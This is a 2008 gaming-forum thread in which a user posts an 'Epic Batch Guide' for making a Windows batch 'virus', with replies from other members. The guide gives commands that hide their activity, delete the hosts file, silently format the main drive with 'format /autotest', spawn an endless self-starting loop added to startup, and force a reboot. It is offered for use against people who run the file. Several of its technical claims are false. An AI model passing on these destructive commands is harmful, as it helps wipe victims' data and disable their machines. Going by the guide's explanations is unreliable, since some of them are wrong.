Go Back   Gaming Gutter > Just Chat > Guides & Tutorials


Guides & Tutorials - Your gaming walk-thrus and tutorials.

» Site Navigation
» Home
» FAQ
» Log in
User Name:

Password:

Not a member yet?
Register Now!
» Advertisement
» Recent Threads
Go to first new post F*CKING FORUM CLOCK!!@@!
Yesterday 08:58 AM
Last post by Bex
Today 12:46 AM
23 Replies, 24 Views
Go to first new post GamingGutter Chibis
08-10-2008 08:31 PM
by Li-Shun
Last post by cookieface
Today 12:41 AM
219 Replies, 220 Views
Go to first new post Your last stop, for...
08-18-2008 10:26 PM
Last post by Mortcast
Today 12:38 AM
10 Replies, 11 Views
Go to first new post i <3 my friends.
08-18-2008 05:57 PM
Last post by cookieface
Today 12:27 AM
19 Replies, 20 Views
Go to first new post Why is KYO being CLONED?!
Yesterday 11:59 PM
Last post by Agita & Kyo
Today 12:22 AM
7 Replies, 8 Views
Reply
 
LinkBack Thread Tools Display Modes

 Epic Batch Guide
Old 05-18-2008, 07:02 AM   #1 (permalink)
Banned
 
Junkas is offline
Join Date: Nov 2006
Location: New Jersey
Age: 13
Posts: 953
iTrader: 0 / 0%
Junkas Is Amongst RoyaltyJunkas Is Amongst Royalty
Rep Power: 0
Epic Batch Guide

Epic Batch Guide 1.0


Lets start with simplistic, say you want to to make your virus (of sorts) display a message, you would do that with echo.

Code:
@echo FUCK YOU!!
Simple enough; now you need to follow that up with some commands for doing stuff. Make sure echo is off.

Code:
@echo off
Put that as the first line in your batch file. This makes it so that they (the people running the file) cannot see what the batch file is doing.

Now Some Commands.

1) Block Internet Access

Code:
 cd WINDOWS\SYSTEM32\DRIVERS\ETC
attrib hosts -r -h
del hosts
That deletes the files that are necessary for you to access the internet.
(Also, make sure echo is OFF, or else it show that the file is deleting stuff)

2) Hidden Command (HiCM)

Quote:
format /autotest
This command is lesser know, because it is indeed not documented. What this does is format the main drive without asking for confirmation from the user. Make sure echo is off so it does not show the formatting process.

3) Unending Loop

Code:
@echo off
:loop
start ****.bat
goto loop
You change out **** with the name of your batch file, what this does is continually open and open and open the batch file slowing your PC down until it dies, you must have a fast computer, 4 gigs of ram or more to defend against this attack. For extra lulz make it copy into system startup.

Protip: You may want to use remarks, so you can go back and edit them later, knowing what you put them there for.

Code:
rem THIS IS A REMARK, BASICALLY A COMMENT IN THE CODE.
4) Shutdown force

Code:
shutdown -r -t 10 -c ""
In between the quotations is where you want to put the shutdown message, it can be anything at all.

/Guide
  Reply With Quote

 
Old 05-21-2008, 02:06 PM   #2 (permalink)
Banned
 
Nekad is offline
Join Date: Sep 2007
Location: Antarctica
Posts: 675
iTrader: 0 / 0%
Nekad Is gaining popularity
Rep Power: 0
n00b question:
what the hell is batch?
  Reply With Quote

 
Old 05-21-2008, 04:35 PM   #3 (permalink)
Banned
 
Junkas is offline
Join Date: Nov 2006
Location: New Jersey
Age: 13
Posts: 953
iTrader: 0 / 0%
Junkas Is Amongst RoyaltyJunkas Is Amongst Royalty
Rep Power: 0
A simple "language" on the PC, no need to compile just save as .bat from notepad.
  Reply With Quote

 
Old 05-21-2008, 04:43 PM   #4 (permalink)
VIP Member

 
Wilfuk's Avatar
 
Wilfuk is offline
Join Date: Sep 2006
Location: The great STL
Age: 18
Posts: 5,229
iTrader: 14 / 100%
Wilfuk Is a Lord of AwesomenessWilfuk Is a Lord of AwesomenessWilfuk Is a Lord of AwesomenessWilfuk Is a Lord of Awesomeness
Rep Power: 16
already know all of those =P
But nice ^_^

As for this:
Code:
@echo off
:loop
start ****.bat
goto loop
You can do the same exact thing with:
Code:
@echo off
start *.bat
run *.bat
Both work exactly the same.
__________________


My Programs:
Subeta Wizard Auto Quester
Neopets Avatar and BD Challenger Grabber
Neopets Earning Calculator

Please Do Not Add Me On MSN Unless I Ask You



  Reply With Quote

 
Old 05-21-2008, 04:45 PM   #5 (permalink)
Banned
 
Junkas is offline
Join Date: Nov 2006
Location: New Jersey
Age: 13
Posts: 953
iTrader: 0 / 0%
Junkas Is Amongst RoyaltyJunkas Is Amongst Royalty
Rep Power: 0
I usually use

categories (:****) to organize anyway. it's just my prerogative.
  Reply With Quote

 
Old 05-24-2008, 06:43 AM   #6 (permalink)
Full Member
 
ThyUnkown12's Avatar
 
ThyUnkown12 is offline
Join Date: May 2008
Posts: 14
iTrader: 0 / 0%
ThyUnkown12 Is gaining popularity
Rep Power: 0
This batch file is basically lethal isnt it?
  Reply With Quote
Reply

Bookmarks



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Powered by vBadvanced CMPS v3.0 RC2

All times are GMT -7. The time now is 12:46 AM.


vBulletin skin developed by: eXtremepixels
The contents of this webpage are copyright © 2006-2008 GamingGutter.com. All Rights Reserved.

Page generated in 0.16634488 seconds (100.00% PHP - 0% MySQL) with 19 queries